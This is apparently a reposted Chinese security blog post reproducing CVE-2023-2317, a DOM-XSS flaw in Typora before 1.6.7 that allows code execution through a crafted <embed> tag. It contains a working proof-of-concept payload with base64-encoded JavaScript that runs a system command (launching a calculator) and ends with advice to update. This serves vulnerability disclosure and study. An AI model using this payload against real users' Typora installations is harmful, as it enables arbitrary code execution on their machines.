Typora DOM-XSS漏洞导致代码执行(CVE-2023-2317)

admin
admin
admin
139984
文章
114
评论
2023年8月30日03:02:12评论14 views字数 1039阅读3分27秒阅读模式
声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。
0X01 简介
Typora一款 Markdown 编辑器和阅读器。
官网(中文站):
https://typoraio.cn/
漏洞编号:
CVE-2023-2317
影响范围:
Typora< 1.6.7
漏洞描述:
在Windows和Linux,1.6.7之前的Typora中updater/update.html允许通过在<embed>标签中加载 typora://app/typemark/updater/update.html在Typora主窗口的上下文中运行任意JavaScript代码。如果用户在 Typora 打开恶意文件,或恶意复制文本并将其粘贴到 Typora 中,则可利用此漏洞。
测试环境:
Typora 1.5.12
 
0X02 漏洞复现
POC:
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
BASE64解密内容:
reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])
Typora DOM-XSS漏洞导致代码执行(CVE-2023-2317)
直接粘贴
Typora DOM-XSS漏洞导致代码执行(CVE-2023-2317)
点击空白处,执行代码。
Typora DOM-XSS漏洞导致代码执行(CVE-2023-2317)
0X03 修复建议

更新至最新版。

 
0X04 写在最后
一起聊天可以加群730057927
侵删!

原文始发于微信公众号(皓月的笔记本):【漏洞复现】Typora DOM-XSS漏洞导致代码执行(CVE-2023-2317)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月30日03:02:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Typora DOM-XSS漏洞导致代码执行(CVE-2023-2317)https://cn-sec.com/archives/1994194.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息